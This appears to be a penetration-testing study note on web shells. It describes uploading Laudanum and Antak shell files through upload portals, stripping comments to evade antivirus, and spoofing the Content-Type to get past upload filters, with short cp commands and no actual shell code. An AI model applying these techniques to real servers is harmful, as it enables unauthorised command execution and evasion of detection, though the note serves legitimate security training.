Web Shells & Payloads

This Page will be specific for Web Shells, reverse and bind shells are discussed in other sections.

We'll dive deeper into metasploit and its details in a later note, but this section will give you a taste of different shells, use cases and considerations.

For reverse shells, consider having a look at this.

Web Shells

The idea is to inject a file with a web app language through an upload portal (difficulty varies of course) and then navigate to the path to where it was uploaded in order to execute it.

Considerations

  • Huge fingerprints left on the server since we're uploading files.

  • Limited interactivity with the target OS and shells will most likely have restricted and very few features.

  • Files might be deleted after a specific period of time.

  • We may want to remove the ascii art and comments when uploading the file as it may trigger alerts and AV.

Laudanum

A repo of pre-built injectable files for different web app languages including but not limited to: asp, aspx, jsp and php.

Not found
# Make a copy to not modify the original script.
$ cp <path-to-shell.aspx> <target-path>

And then proceed by modifying the necessary lines and fields in the file to specify the target ip, port ...etc

  • ASP: Microsoft's old server-side scripting language to build dynamic websites. (Replaced by ASP.NET)

  • ASPX: A file extension for ASP.NET, used to create web pages with C# or VB.NET code.

  • JSP: Java Server Pages, used to build dynamic websites with Java.

  • PHP: A popular open-source scripting language for building dynamic web pages.

Active Server Page Extended (ASPX) is a file type/extension written for Microsoft's ASP.NET Framework. On a web server running the ASP.NET framework, web form pages can be generated for users to input data. On the server side, the information will be converted into HTML. We can take advantage of this by using an ASPX-based web shell to control the underlying Windows operating system.

Antak

The power of Antak Web Shell comes from the use of PowerShell to interact with the windows target in a way the looks exactly like a C2 platform. 

$ ls /usr/share/nishang/Antak-WebShell

    antak.aspx  Readme.md

$ cp /usr/share/nishang/Antak-WebShell/antak.aspx <target-directory>

PHP Web Shell

Not found

Consider changing the specific file extension wanted in BurpSuite/ZAP, for example if the upload functionality needs an image not a php file: application/x-php to image/gif

More Shells, but from the other side

Placeholder for defensive side of the Reverse Shells.

PreviousWindows PtTNextSkill Assessment

Last updated